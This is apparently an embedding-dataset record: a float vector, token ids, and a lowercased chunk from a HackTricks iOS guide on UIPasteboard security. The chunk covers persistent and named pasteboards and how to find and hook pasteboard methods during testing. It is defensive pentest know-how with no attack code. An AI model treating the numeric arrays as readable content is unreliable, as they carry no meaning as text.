-0.6543094515800476, 0.5186086297035217, 0.17370444536209106, -0.6443306803703308, 0.5797365307807922, -0.4228358566761017, 0.23363621532917023, 1.1168421506881714, -0.14129938185214996, -0.03480787202715874, 0.2790054678916931, 0.13798506557941437, 0.46194636821746826, -0.2131408005952835, 0.1476660817861557, 0.03125732019543648, 0.31491023302078247, -0.4049886465072632, 0.8086335062980652, 0.7515547275543213, 0.7678203582763672, 0.3962266445159912, 0.18712015450000763, 0.07000000774860382, 0.27636483311653137, 0.2435964196920395, 1.1254222393035889, 0.13376420736312866, 0.46608346700668335, 0.09400009363889694, -0.4266968369483948, 0.006207264494150877, -0.0974804237484932, 0.16272138059139252, 0.7910982966423035, -0.7342873215675354, 0.37847644090652466, 0.18245552480220795, 0.16384683549404144, -0.13033610582351685, -0.4437723159790039, 0.4257674813270569, 0.4975280165672302, -0.7406393885612488, -0.03513401374220848, -0.050368718802928925, 0.04525165259838104, -0.08301723003387451, 0.1621609777212143, 0.18621569871902466, 0.06949624419212341, 0.35318228602409363, 0.002483054529875517, -0.4285646080970764, -0.6600300669670105, -0.7295411825180054, -0.041254013776779175, -0.9653280973434448, 0.048282139003276825, -0.7556884288787842, -0.11779578030109406, 0.2675630450248718, -1.0524989366531372, -0.1613178700208664, -0.5451886653900146, 0.4823935329914093, -0.6536800861358643, -0.10990919917821884, 0.39769721031188965, -0.4237844944000244, 0.4647449254989624, -0.7863113284111023, 0.28892189264297485, -0.5519841313362122, 0.5435326099395752, -0.6375707387924194, -0.010292771272361279, -0.4806582033634186, -0.5597666501998901, 0.3969002962112427, -0.3256785571575165, 0.3324836492538452, -0.3477957546710968, -0.03953941911458969, 0.10553539544343948, -0.8064574003219604, -0.17950236797332764, 0.2595170736312866, 0.2629857063293457, -0.759657621383667, -0.05581391602754593, 0.11109528690576553, -0.10130596160888672, 0.3392319679260254, 0.44921791553497314, -0.043609995394945145, 0.28969600796699524, 0.2849191725254059, 0.29078078269958496, -0.8508185148239136, 0.42728158831596375, 0.3761095106601715, -0.12083204090595245, -0.0811588391661644, 0.1151665672659874, -0.18714524805545807, -0.15955203771591187, -0.5351288914680481, -0.16309279203414917, -0.128217875957489, -0.02556414157152176, -0.2234441637992859, -1.307130217552185, 0.24066783487796783, -0.29552680253982544, 0.024126026779413223, -0.5763287544250488, -0.43653014302253723, 0.8870101571083069, -0.10024213790893555, 0.3352985680103302, -0.36238396167755127, -0.20549708604812622, 0.12846937775611877, 0.34096503257751465, -0.06760528683662415, 0.23115363717079163, 0.032770343124866486, -0.614402174949646, -0.45127058029174805, 0.21317535638809204, 0.04522768780589104, -0.5453990697860718, 0.49596574902534485, -0.827842116355896, 0.015153773128986359, 0.011651883833110332, -0.3145309388637543, 0.41875648498535156, 0.40417569875717163, 0.7842910885810852, -0.4341074228286743, 0.10070404410362244, -0.18883907794952393, -0.1532830148935318, -0.05522751063108444, 0.8006995320320129, -0.017017291858792305, -0.21787627041339874, 0.04333508014678955, -0.8822442293167114, -0.2005041539669037, 0.9257475733757019, 0.6657866835594177, -0.738534688949585, -0.08866117149591446, -0.4215022623538971, -0.20795689523220062, 0.6030609011650085, -0.4910446107387543, -0.576637864112854, 1.1865918636322021, 0.28686049580574036, 1.6046234369277954, -1.1627932786941528, -0.24129849672317505, 0.3595871031284332, 0.4484666585922241, 0.9796648621559143, -0.15415649116039276, -0.015294203534722328, -0.5250082015991211, 0.10823675245046616, -0.4499015808105469, -0.32453081011772156, -0.03803376108407974, -0.12110763788223267, 0.33689096570014954, 0.34016597270965576, -0.8321923613548279, -0.6569177508354187, 0.4216020405292511, 0.777199387550354, 0.4512343406677246, 0.1733725517988205, 0.7416147589683533, 0.15294651687145233, 0.10528620332479477, 0.012201265431940556, -0.03922327235341072, 0.14809131622314453, -0.09165079146623611, 0.41931381821632385, -0.7253734469413757, -0.2719177007675171, -0.2469218373298645, 0.028237340971827507, -0.7235091924667358, -0.015325658023357391, 0.44585853815078735, 0.6802159547805786, -0.600740373134613, 0.12695473432540894, 0.3244946002960205, -0.2813466191291809, -0.5013278722763062, -0.16783754527568817, -0.3145046532154083, -0.031000381335616112, 0.6667100191116333, 0.09008107334375381, -0.20416678488254547, -0.13984926044940948, 0.3605421185493469, 0.23104609549045563, -0.5144951939582825, -0.629669725894928, -0.5091081857681274, -0.6141647100448608, -0.48921385407447815, 0.5971179008483887, 1.0448445081710815, 0.11121999472379684, 0.5977218747138977, -0.02014182135462761, 0.33096691966056824, 0.3160414397716522, -0.8789253234863281, -0.09349146485328674, -0.6333359479904175, -0.005421295762062073, 0.6746326684951782, 0.38821300864219666, -0.25698551535606384, 0.22491797804832458, 0.4637152850627899, -0.4378078579902649, 0.14818662405014038, -0.3129136860370636, -0.2649441659450531, -0.22870081663131714, 0.13685670495033264, -0.023993253707885742, 0.6034808158874512, -0.27551940083503723, 0.02689673937857151, -0.1491648554801941, 0.5536961555480957, -0.3254966139793396, -0.7217610478401184, 0.7592166066169739, -0.5879614353179932, -0.182732954621315, 0.4506428837776184, 0.5830485820770264, -0.2681216597557068, -0.09858948737382889, -0.3525615334510803, -0.8176960349082947, 0.41717275977134705, -0.5759257674217224, -0.6078639626502991, -0.4124116897583008, -0.048437125980854034, -0.19530780613422394, -1.0320671796798706, 0.6568796038627625, 0.055677007883787155, 0.378330796957016, -0.1168578565120697, -0.7572925090789795, -0.014667211100459099, -0.33994439244270325, -0.4243033528327942, 0.6731483340263367, 0.27558690309524536, -0.30896782875061035, -0.014613383449614048, -0.5828728079795837, -0.45719027519226074, 0.14187242090702057, -0.21733684837818146, -0.4399341344833374, 0.22749708592891693, 0.2481604516506195, 0.39349639415740967, -0.15841005742549896, -0.7776733040809631, 0.24224601686000824, 0.5964587926864624, 0.5245307683944702, -0.706013023853302, 0.11341945827007294, 0.25117817521095276, -0.0054242308251559734, -0.7077915668487549, 0.5987369418144226, -0.11384396255016327, 0.3046094477176666, 0.4809624254703522, 0.2692142128944397, 0.6712495684623718, -0.46304258704185486, -0.6420758366584778, 0.5022851228713989, -0.20127642154693604, -0.21259796619415283, -0.560073971748352, -0.024249864742159843, -0.10120946168899536, 0.35247182846069336, 0.511547327041626, -0.1930224895477295, -0.459524005651474, -0.759863555431366, 0.4391203224658966, -0.6200733780860901, -0.2715068459510803, -0.23722730576992035, -0.037228766828775406, -0.6321824789047241, 0.6269869804382324, -0.0030354768969118595, -0.9380673766136169, 0.3497220277786255, -0.46156901121139526, -0.37003597617149353, -0.20264475047588348, -0.22248858213424683, -0.5748734474182129, 0.0826810747385025, 0.015274645760655403, 0.8697319626808167, -0.13411428034305573, -0.04402223229408264, -0.5369532704353333, 0.030427614226937294, 0.6473851799964905, 0.08377280831336975, -0.05837749317288399, -0.02884358912706375, -0.016479890793561935, 0.22110643982887268, -1.2813471555709839, 0.31523746252059937, -0.7606307864189148, 0.4203677475452423, -0.7091537714004517, -0.3485100567340851, -0.253801167011261, -0.019119054079055786, -0.48911747336387634, 0.09035863727331161, 0.9551811814308167, -0.5014234781265259, 0.26380854845046997, -1.0444300174713135, 0.6678391098976135, -0.24171507358551025, -0.15021300315856934, -1.1971367597579956, 0.6852760910987854, -0.5185710787773132, -0.30901870131492615, 0.3882915675640106, -0.23764896392822266, -0.2449713945388794, 0.1462104171514511, -0.26795127987861633, 0.362665057182312, -0.709880530834198, -0.2963109016418457, 0.9839939475059509, -0.6137752532958984, -0.037963464856147766, -0.08791778981685638, 0.6843776702880859, -0.04245319217443466, -0.4026835262775421, 0.07656408846378326, 0.16017045080661774, -0.19477389752864838, -0.4577549397945404, -0.10741345584392548, -0.1474810242652893, -0.9010316729545593, 0.6916329264640808, 0.4085632562637329, 0.1487693190574646, 0.5020112991333008, 0.43634095788002014, -0.7223783731460571, 0.16006535291671753, 0.4039181172847748, -0.6624597907066345, 0.515683114528656, 0.5388804078102112, 0.26591065526008606, 0.566600501537323, 0.11051896959543228, -0.8103975653648376, 0.26798978447914124, -0.0583735890686512, 0.9551723003387451, -0.03471920266747475, -0.9123744964599609, 0.6013762950897217, 0.7581419348716736, -0.19302904605865479, -0.13991543650627136, -0.26692715287208557, 0.09539970755577087, 0.33363470435142517, 0.27061188220977783, 0.08960959315299988, 0.20368680357933044, -0.4882650673389435, -0.29246753454208374, 0.5534430146217346, 0.12276742607355118, 0.41055920720100403, -0.3375261127948761, 0.20526790618896484, 0.039546459913253784, 0.006115849129855633, 0.3493598997592926, -0.17414407432079315, -0.33891499042510986, -0.5186161994934082, 0.13124288618564606, -0.19448499381542206, 0.48276859521865845, 0.6297720670700073, 0.1804490089416504, 0.1036887988448143, 0.36140990257263184, -0.018590888008475304, 0.6491187810897827, -0.20740413665771484, 0.1748679131269455, 0.2185324728488922, -1.025481939315796, -0.29828140139579773, -0.3053309917449951, 0.8045751452445984, -0.01532480027526617, -0.23690201342105865, -0.23686978220939636, 0.4781627655029297, 0.49537378549575806, 0.6812818646430969, 0.7405914068222046, -0.5237732529640198, -0.7408248782157898, -0.6564980745315552, 0.15598243474960327, -0.45465201139450073, -0.1367090940475464, 0.22550362348556519, 0.31468522548675537, 0.12949402630329132, -0.7842458486557007, -0.6215237379074097, 0.6272832751274109, -0.21712824702262878, -0.15583014488220215, -1.1481298208236694, 0.11098146438598633, 0.07309486716985703, -0.5887919664382935, -0.8286453485488892, 0.0920405164361, 0.3318924903869629, -0.20506548881530762, -0.5150162577629089, -0.2827928364276886, -0.3177742063999176, 0.5997130274772644, 0.1165914386510849, 0.17501957714557648, -0.7995918989181519, 0.26165464520454407, 0.2698633074760437, 0.5491896867752075, 0.08780715614557266, 0.4084712564945221, 0.04329941049218178, -0.5668930411338806, 0.3108757436275482, 0.2205580472946167, -0.19417327642440796, -0.4847273826599121, 0.14506132900714874, 0.07023440301418304, -0.2127867192029953, -0.11615529656410217, -0.14074698090553284, 0.0894487127661705, -0.5357333421707153, -0.1018441691994667, -0.3330455720424652, 0.12992550432682037, 0.37854108214378357, 0.3764292001724243, -0.6030879020690918, 0.5314135551452637, -0.031728293746709824, 0.8661618828773499, -0.6779331564903259, -0.09062103182077408, 0.6018052697181702, 0.43278828263282776, 0.5851651430130005, 0.39295709133148193, 0.2516419291496277, 0.023110177367925644, 0.18250107765197754, -0.0443371944129467, -0.15120384097099304, 0.37697893381118774, -0.7357196807861328, 0.17415450513362885, -0.10181083530187607, -0.14702817797660828, -0.06433418393135071, 0.20711173117160797, 0.2976231873035431, 0.0212571881711483, 0.016315994784235954, -0.3490571677684784, 0.09274011105298996, -0.28281137347221375, -1.0695797204971313, -1.1544476747512817, 0.5356366038322449, -0.49761074781417847, -0.19248785078525543, -0.6842187643051147, -0.1373862624168396, -0.3993050754070282, 0.33442047238349915, -0.3706651031970978, 0.3621472716331482, 0.6383679509162903, -0.22066137194633484, 0.66924649477005, -0.4811135232448578, -0.2850898504257202, 0.3944145143032074, 0.39467859268188477, -0.2700074017047882, -0.2985188066959381, 0.822065532207489, 1.128145456314087, -0.21272403001785278, -0.1920730471611023, -0.630664050579071, 0.3578917384147644, -0.0401836559176445, -0.2952198386192322, 0.19009393453598022, 0.03858032822608948, -0.6560283899307251, 0.17080645263195038, -0.43448278307914734, 0.23871612548828125, -0.6461302638053894, 0.1892569214105606, 0.39577266573905945, -0.40414297580718994, 0.14924582839012146, 0.22236138582229614, -0.07802499085664749, -0.11486057192087173, 0.43006089329719543, -0.241413876414299, 0.626641571521759, -0.07086820155382156, -0.2559470534324646, 0.32541990280151367, 0.47630926966667175, 0.7386871576309204, 0.5587151646614075, -0.4783955514431, 0.6870643496513367, 0.5912163853645325, -0.396591454744339, -0.5989198684692383, 0.5761434435844421, -0.41543272137641907, -0.16822218894958496, 0.6400946378707886, -0.05456450954079628, -0.28457826375961304, 0.17111647129058838, -0.6684548854827881, -0.15270186960697174, -0.499477744102478, -0.5650792717933655, -0.0005841398378834128, -0.22739660739898682, 0.4189798831939697, -0.059337567538022995, -0.06776493042707443, 0.03755921497941017, 0.033865489065647125, 0.15389543771743774, -0.1377609521150589, -0.5278748273849487, 0.11995914578437805, 0.6666661500930786, 0.9087686538696289, -0.7039496302604675, 0.4437497854232788, -0.43396154046058655, 0.18106095492839813, 0.33495470881462097, -0.3661789894104004, -0.4152936339378357, -0.11907307058572769, -0.1641409695148468, -0.2791461646556854, -0.6281960010528564, -0.009747907519340515, -0.1880933791399002, -0.12641273438930511, 0.48424383997917175, -0.4506813585758209, -0.6446378231048584, -0.2578992247581482, -0.3534568250179291, -0.7752552032470703, -0.1234150230884552, 0.7261592149734497, -0.3206828534603119, -0.13089735805988312, 0.024095114320516586, -0.13055327534675598, 0.0446886271238327, 0.3008668124675751, 0.31307244300842285, 0.2473568320274353, 0.7880402207374573, 0.6228731274604797, -0.3455376625061035, -0.6172049641609192, 0.5629495978355408, -0.18265625834465027, -0.16405384242534637, -0.1766507774591446, -0.3208567202091217, -0.052060697227716446, -0.30445918440818787, -1.0056066513061523, -0.12929978966712952, -0.09550847858190536, -0.1642685979604721, -0.6842839121818542, -0.286464661359787, 0.46691760420799255, -0.47974497079849243, -0.25419947504997253, 0.4908158779144287, -0.21463602781295776, 0.43253371119499207, -0.47178253531455994, 0.1598663330078125, -0.32149985432624817, 0.04582668095827103, -0.9674999713897705, 0.33223676681518555, -0.04813900217413902, 0.008227868936955929, 0.109056755900383, -0.10439317673444748, -0.3979276418685913, 0.16688671708106995, 0.03983606770634651, 0.02877766452729702, 0.11656300723552704, -0.5402892827987671, 0.22793786227703094, -0.09181669354438782, -0.03935988247394562, -0.3029686510562897, -0.05996698513627052, 1.255183458328247, 0.12255445867776871, 0.8569848537445068, 0.46730923652648926, -0.549786388874054, 0.22878868877887726, 0.1027672216296196, 0.7229670286178589, -0.4891591966152191, 0.18979109823703766, -0.14973360300064087, 0.11165671050548553, -0.16593652963638306, -0.1726708710193634, -0.6181552410125732, 0.3934636116027832, -0.6422211527824402, 0.316244512796402, -0.7680420279502869, -0.1864933967590332, -1.554028868675232, 0.41177818179130554, -0.7122993469238281, -0.21535903215408325, -0.29433977603912354, -0.42475053668022156, 0.6070812344551086, -0.9721341133117676, 4.560915470123291, 0.8195011019706726, 0.42678743600845337, 1.0466126203536987, 0.3436128497123718, 0.7763104438781738, 0.40563786029815674, -0.8417090773582458, -0.131705641746521, -0.624031126499176, 0.33025574684143066, -0.24588942527770996, 0.3903777301311493, 0.5324077010154724, -0.03928143158555031, 0.675194263458252, -0.6764723658561707, -0.3282018005847931, -0.055682167410850525, -0.7835816144943237, -0.7363719940185547, 0.5228528380393982, -0.1592749059200287, 0.8828897476196289, -0.15973636507987976, 0.32345953583717346, 0.28950873017311096, 0.14306075870990753, 0.3449295461177826, -0.22201113402843475, -0.13017292320728302, -0.5231061577796936, 0.2079213559627533, -0.6298496127128601, -0.49751439690589905, 0.278594434261322, 0.04922591522336006, -0.5281338691711426, -0.2476980835199356, -0.11538857966661453, -0.6618314385414124, 0.06795188784599304, -0.3429064452648163, 0.21813884377479553, 0.1752813160419464, 0.24580353498458862, 0.49953317642211914, 0.23230931162834167, 0.40843889117240906, -0.45967838168144226, 0.6435511112213135, -0.5016949772834778, 0.15501902997493744, -0.5431586503982544, -0.8367619514465332, -0.07265236228704453, -0.0029252313543111086, 0.12498190999031067, 0.13561221957206726, 0.135179802775383, 0.3867817521095276, -0.0884406566619873, -0.32689669728279114, -0.3156382739543915, -0.8120354413986206, 0.1426602303981781, 0.33961009979248047, 0.7706217169761658, -0.08206943422555923, -0.6580344438552856, -0.45944586396217346, -0.1960180401802063, 0.09284260869026184, -0.41874030232429504, 0.3639056384563446, 0.18197233974933624, -0.03771865367889404, 0.6588072776794434, 0.0437314473092556, -1.1309541463851929, 0.40225890278816223, -0.008150815032422543, -0.34054097533226013, 0.07701856642961502, 0.6772209405899048, 0.32966190576553345, -0.4792659282684326, 0.03834713622927666, -0.5117767453193665, 0.24264276027679443, 0.522095799446106, 0.04266827926039696, -0.004163338802754879, -0.0897625982761383, -0.06995498389005661 ]
[ 2442, 2275, 2005, 1037, 6254, 2828, 2003, 1996, 2535, 1012, 1996, 2535, 2064, 2022, 1000, 13972, 1000, 1006, 2017, 2064, 4653, 2008, 5371, 2828, 2021, 2017, 3685, 10086, 2009, 1007, 1010, 1000, 3559, 1000, 1006, 2017, 2064, 4653, 1998, 10086, 2008, 5371, 2828, 1007, 1010, 1000, 3904, 1000, 1006, 2009, 1005, 1055, 2025, 9675, 2054, 2017, 2064, 2079, 2007, 2008, 5371, 1007, 1012, 1041, 1012, 1043, 1012, 1024, 2017, 2215, 2115, 10439, 2079, 2022, 3378, 2007, 3056, 5371, 4127, 1010, 4453, 2593, 2011, 5331, 1010, 2011, 2771, 4168, 2828, 1010, 2030, 2011, 21183, 2072, 8909, 4765, 18095, 1012, 2065, 2017, 2215, 2115, 10439, 2000, 2022, 3378, 2007, 2019, 21183, 2072, 2828, 1010, 1996, 10439, 2323, 2593, 12324, 2030, 9167, 1996, 2828, 1010, 2004, 4728, 1996, 2828, 2089, 2025, 2022, 2124, 2000, 1996, 2291, 1998, 25719, 2000, 4242, 21183, 2072, 2828, 2038, 3432, 2053, 3466, 2012, 2035, 1012, 8790, 5604, 29278, 6016, 3450, 2017, 2064, 1024, 8103, 1996, 4118, 2057, 2031, 2464, 1999, 1996, 10763, 4106, 1006, 1999, 4183, 1006, 4023, 4221, 5244, 1024, 4646, 18908, 12848, 6447, 1024, 1007, 1007, 2000, 2131, 1996, 4023, 4221, 5244, 1998, 4646, 18908, 12848, 6447, 1012, 2424, 2041, 1996, 12421, 3450, 2011, 8103, 2075, 12421, 18908, 7730, 13874, 2015, 3200, 1012, 2005, 4909, 5167, 2017, 2064, 1024, 3745, 1037, 5371, 2007, 1996, 10439, 2013, 2178, 10439, 2030, 4604, 2009, 3081, 2250, 25711, 2030, 1041, 1011, 5653, 1012, 5454, 1996, 5371, 2061, 2008, 2009, 2097, 9495, 1996, 1000, 2330, 2007, 1012, 1012, 1012, 1000, 7982, 1006, 2008, 2003, 1010, 2045, 2003, 2053, 12398, 10439, 2008, 2097, 2330, 1996, 5371, 1010, 1037, 11135, 2005, 2742, 1007, 1012, 8103, 4646, 1024, 2330, 3126, 2140, 1024, 7047, 1024, 1998, 2151, 2060, 4725, 2008, 2020, 4453, 1999, 1037, 3025, 10763, 4106, 1012, 11949, 1996, 10439, 5248, 1012, 1999, 2804, 1010, 2017, 2071, 4604, 3563, 15451, 29021, 6764, 1998, 1013, 2030, 2224, 1037, 11865, 13793, 3070, 6028, 1012, 3191, 2129, 2182, 1012, 102 ]
hack_tricks
432.txt
2
[CLS] ios uipasteboardthe uipasteboard enables sharing data within an app, and from an app to other apps. there are two kinds of pasteboards : systemwide general pasteboard : for sharing data with any app. persistent by default across device restarts and app uninstalls ( since ios 10 ). custom / named pasteboards : for sharing data with another app ( having the same team id as the app to share from ) or with the app itself ( they are only available in the process that creates them ). non - persistent by default ( since ios 10 ), that is, they exist only until the owning ( creating ) app quits. some security considerations : users cannot grant or deny permission for apps to read the pasteboard. since ios 9, apps cannot access the pasteboard while in background, this mitigates background pasteboard monitoring. apple warns about persistent named pasteboards and discourages their use. instead, shared containers should be used. starting in ios 10 there is a new handoff feature called universal clipboard that is enabled by default. it allows the general pasteboard contents to automatically transfer between devices. this feature can be disabled if the developer chooses to do so and it is also possible to set an expiration time and date for copied data. then, it's important to check that sensitive information isn't being saved inside the global pasteboard. it's also important to check that an application isn't using the global pasteboard data to perform actions, as malicious application could tamper this data. an application can also prevent its users to copy sensitive data to the clipboard ( which is recommended ). static analysisthe systemwide general pasteboard can be obtained by using generalpasteboard, search the source code or the compiled binary for this method. using the systemwide general pasteboard should be avoided when dealing with sensitive data. custom pasteboards can be created with pasteboardwithname : create : or pasteboardwithuniquename. verify if custom pasteboards are set to be persistent as this is deprecated since ios 10. a shared container should be used instead. dynamic analysishook or trace the following : generalpasteboard for the system - wide general pasteboard. pasteboardwithname : create : and pasteboardwithuniquename for custom pasteboards. you can also hook or trace the deprecated setpersistent : method and verify if it's being called. when monitoring the pasteboards, there is several details that may be dynamic
[ 0.34795498847961426, -0.6307398676872253, 0.07807349413633347, 1.0239263772964478, -0.3726609945297241, -0.4508163034915924, 0.1037638932466507, 0.4555727541446686, 0.4539220631122589, 0.4555293917655945, -0.11038351058959961, 0.22233517467975616, -0.29765787720680237, -0.022355984896421432, -0.14156313240528107, -0.3225504159927368, -0.1929478645324707, 0.40216654539108276, -0.9034411907196045, -0.7640910744667053, 0.6948263645172119, 0.4413132667541504, -0.8362453579902649, -0.913923978805542, -0.06903107464313507, 0.8240491151809692, 0.3170996904373169, 0.01005592942237854, 0.5454267859458923, 0.4308134615421295, -0.08837929368019104, -0.10874199867248535, -0.048094116151332855, -0.4881848096847534, 0.14714381098747253, -0.1602313071489334, 0.9221227169036865, -0.2026330977678299, 0.023844441398978233, -0.6728101968765259, 0.4956201910972595, -0.4282388389110565, -0.011656097136437893, -0.43165093660354614, -0.41865280270576477, -0.42079225182533264, 0.02952869050204754, -0.1544414758682251, 0.758169412612915, -0.09543169289827347, 0.2888338565826416, 0.373822420835495, 0.35573574900627136, 0.15871554613113403, 0.4501497745513916, -0.09585242718458176, -0.6298004984855652, -0.05059322714805603, -0.5230993628501892, 0.23062948882579803, 0.16492146253585815, 0.0923064649105072, -0.34718313813209534, -1.166317105293274, 0.05346103385090828, 0.48687809705734253, 0.14342331886291504, -0.33862271904945374, -0.26889172196388245, 0.010215586982667446, -0.28511396050453186, 0.08708051592111588, -0.4050893485546112, -0.3721146881580353, -0.05803506448864937, -0.5290244817733765, 0.10470712929964066, -0.1813473254442215, 0.13008761405944824, 0.6710479855537415, 0.1876755803823471, 0.5099096894264221, -0.15361765027046204, -0.12148207426071167, -0.6546667814254761, -0.4687928855419159, 0.6779903173446655, 0.45742666721343994, -0.5519697070121765, -0.007987548597157001, 0.15056607127189636, 0.13271498680114746, -0.7452000379562378, -0.16719931364059448, 0.6134855151176453, 0.6570441722869873, -0.0862220823764801, -0.14150583744049072, -0.1199476569890976, -0.07525215297937393, 1.023673415184021, 0.9077790379524231, -0.22514401376247406, 0.4570797383785248, -0.5888075232505798, 0.25463372468948364, 0.37580978870391846, -0.5376890897750854, -0.41360315680503845, -0.44849589467048645, 0.15992501378059387, 0.6004085540771484, 0.6110527515411377, -0.20779290795326233, 0.4166603684425354, 0.41975992918014526, 0.3035658001899719, 0.29941821098327637, -0.3994770348072052, 0.7068755030632019, -0.31118762493133545, -0.2790384292602539, -0.31824204325675964, -0.42722105979919434, -0.06407579034566879, 0.3803316354751587, 0.5620309114456177, 0.83608478307724, -0.8132851719856262, -0.6772835850715637, 0.12476838380098343, -0.2013872265815735, -0.09943117946386337, 0.579062819480896, -0.42306971549987793, 0.1389450579881668, 0.09817050397396088, 0.3040001392364502, 0.5939640998840332, -0.599064290523529, 0.5892515182495117, 0.12252375483512878, 0.17480306327342987, 0.9214556217193604, 0.5658053755760193, 0.25946924090385437, -0.29210883378982544, -0.32327789068222046, -0.5105847716331482, 0.11756924539804459, -0.0026164380833506584, 0.4847189784049988, 0.4699593782424927, -0.3386358618736267, 0.0014107534661889076, 0.09137182682752609, -0.49603402614593506, 0.5755923390388489, -0.3529033660888672, 0.0020931842736899853, -0.46200528740882874, 1.0489846467971802, 0.33887603878974915, 0.36564263701438904, -0.6200570464134216, 0.7349936962127686, -0.5055211782455444, -0.7017495036125183, -0.24819302558898926, 0.05210705101490021, -0.19235935807228088, 0.3828255534172058, -0.02420288696885109, 0.1759849488735199, 1.09237802028656, 1.096528172492981, 0.17932365834712982, 0.21728834509849548, 0.09104020893573761, 0.3622635304927826, -0.2842097878456116, -0.11536984890699387, 0.44060537219047546, 0.488006591796875, -0.5765424966812134, 0.5496664643287659, -0.7436171174049377, -1.0958198308944702, -0.07367624342441559, -0.3653220534324646, -0.11122212558984756, 0.6227326989173889, -0.5632382035255432, -0.09646371752023697, 0.42162203788757324, 0.08993393182754517, -1.1020991802215576, 0.009964633733034134, -0.04882019758224487, -1.0373659133911133, -0.696789026260376, 0.026379600167274475, -0.2081838697195053, 0.16593711078166962, -0.17075148224830627, -0.03510383516550064, 0.44802290201187134, 0.6389581561088562, -0.2643319070339203, 0.8328067660331726, 0.7372810244560242, -0.2111835479736328, -0.42672279477119446, -0.47846952080726624, 0.6562315821647644, -0.34083735942840576, -0.03384179621934891, 0.21302658319473267, 0.12175612151622772, 0.3828766644001007, 0.16646695137023926, 0.5195280313491821, 0.8788430690765381, 0.23345646262168884, -0.2163236439228058, 0.14856740832328796, 0.7840398550033569, 0.596769392490387, -0.5363674759864807, 0.5513643622398376, -0.4876822829246521, 0.5614063143730164, 0.4851357340812683, 0.8485011458396912, 0.4739205837249756, -0.18879203498363495, 0.00097629614174366, -0.06708372384309769, 0.5341270565986633, -0.30461394786834717, -0.326120525598526, 0.9908979535102844, 0.5920552611351013, 0.9679763913154602, 0.2799173593521118, 0.459085613489151, 0.01444372907280922, 0.6105182766914368, 0.1395038664340973, 0.8254895210266113, -0.4603200852870941, 1.0712345838546753, 0.5327135920524597, 0.18390467762947083, -0.7148746848106384, -0.5869148373603821, 1.136599063873291, 1.007818341255188, -0.42486855387687683, -0.7483232617378235, 0.3014771044254303, 0.07660989463329315, -0.45582515001296997, -0.28970593214035034, 0.21639075875282288, 0.565907895565033, 0.004782766569405794, -0.03572646528482437, -0.6822059750556946, -0.6488285660743713, -0.6246758699417114, -0.3696253299713135, -1.1640516519546509, -0.5184727907180786, -1.1742502450942993, -0.03094112128019333, 0.09970643371343613, -0.8506879210472107, 0.6448503732681274, -0.6553675532341003, -0.38520628213882446, 0.2592839002609253, 0.1492757350206375, 0.03174382448196411, 0.10816340893507004, 0.4985594153404236, -1.1806751489639282, 0.38890737295150757, 0.514484167098999, 0.9754899144172668, -0.08536425232887268, 0.027459589764475822, -0.28446242213249207, -0.07036177814006805, 0.39415326714515686, -0.5838940739631653, 0.443673700094223, 0.3509387671947479, 0.17143115401268005, -0.167921781539917, -0.3377910256385803, 0.06756214797496796, 0.4956124424934387, 0.08797188848257065, -0.3162340819835663, 0.777320921421051, -0.2699497938156128, -0.01849094219505787, 0.6539148092269897, 0.35476160049438477, -0.1796782910823822, 0.07651790976524353, 0.24442128837108612, 0.6684911847114563, -0.6012589931488037, 0.5642083883285522, 0.4180297255516052, 0.7812322378158569, -0.21378585696220398, 0.013638109900057316, -0.39544883370399475, -0.48372650146484375, -0.6140508651733398, -0.08640946447849274, -0.09706763178110123, 0.13354408740997314, 0.019158605486154556, -1.1830213069915771, 0.5054787397384644, -0.9853605628013611, -0.20867808163166046, -0.6064928770065308, -0.21533672511577606, 0.7054429054260254, 0.07751235365867615, -0.03318101912736893, -0.27268603444099426, -0.09222319722175598, 0.1436310112476349, -0.030797110870480537, 0.12277460098266602, -0.5042110681533813, 0.055544838309288025, -0.062058206647634506, -0.19161011278629303, 0.5961488485336304, 0.23831714689731598, -0.4743264615535736, 0.24380697309970856, -0.6294137835502625, 0.04266240447759628, -0.05043397471308708, 0.742761492729187, -0.11325207352638245, -0.4931432604789734, 0.19221803545951843, -0.44664010405540466, 0.0511934868991375, 0.17058008909225464, -0.008719784207642078, 0.18988429009914398, 0.32804253697395325, 0.13934437930583954, 0.35862380266189575, -0.5474820137023926, -0.5396309494972229, -0.3495771586894989, 0.7121816873550415, 0.7401714324951172, -0.8549516201019287, 0.7225733399391174, -0.14430168271064758, 0.021792851388454437, 0.2300228476524353, -0.5654067993164062, -1.0863384008407593, 0.7175382971763611, 0.002503675641492009, 0.5583004951477051, -0.3135460317134857, 0.1080145463347435, 0.5348824858665466, -0.17992988228797913, -0.06047847867012024, 0.511938214302063, 0.007552126422524452, -0.02890375629067421, -0.10445694625377655, 0.14427943527698517, -0.35443413257598877, -0.04994620010256767, -0.46325498819351196, -0.23632138967514038, -0.8178149461746216, -0.4868326783180237, -0.6500707268714905, 0.2858348786830902, 0.699801504611969, 0.49498677253723145, 0.24523654580116272, 0.7392182350158691, 0.39001020789146423, 0.11471312493085861, -0.04510847479104996, -0.3225560188293457, -0.08855777978897095, 0.09885303676128387, 0.6276410818099976, -0.1763315200805664, 0.4555226266384125, -0.42712828516960144, -0.010741043835878372, -0.7333588004112244, -0.2698754668235779, 0.5328953862190247, 0.19520039856433868, -1.4621684551239014, -0.7658631205558777, -0.002336922101676464, 0.07059410959482193, -0.7562055587768555, -0.14739163219928741, -0.47022515535354614, 0.6520431041717529, 0.5717191100120544, -0.45427313446998596, 0.008129659108817577, -0.18266552686691284, 0.45073822140693665, 0.336821973323822, -0.19409707188606262, -0.13607697188854218, -0.6635044813156128, 0.22951869666576385, -0.7112947106361389, 0.6581243276596069, 0.5255928039550781, -0.015258466824889183, 0.047781214118003845, -0.9091099500656128, -0.030636213719844818, 0.5358964204788208, -0.42484965920448303, -0.37892818450927734, -0.10784350335597992, 0.005081404931843281, 0.506621778011322, 0.10969015955924988, -0.15100641548633575, 0.06602830439805984, 0.3821024000644684, -0.40929079055786133, 0.2502228617668152, -0.6824405789375305, 0.025087719783186913, -0.10258796066045761, 0.03918756544589996, -0.7962726354598999, 0.3772255480289459, -0.5948823094367981, 0.14188919961452484, 0.26104536652565, 0.5066708922386169, 0.17093658447265625, 0.08336738497018814, 0.9174800515174866, -0.15533693134784698, -0.276727557182312, 0.34602195024490356, 0.4624656140804291, -0.4141560196876526, 0.2605223059654236, -0.2840448021888733, -0.9350156784057617, 0.5603348016738892, -0.8194079399108887, 0.42233479022979736, 0.27793845534324646, 0.27779409289360046, -0.13858380913734436, -0.2234870344400406, 0.5244455933570862, -0.06768254935741425, 0.288622111082077, -0.5202222466468811, -0.6068805456161499, -0.07016956061124802, -0.18440623581409454, -0.09698661416769028, 0.3973749876022339, 0.3211513161659241, 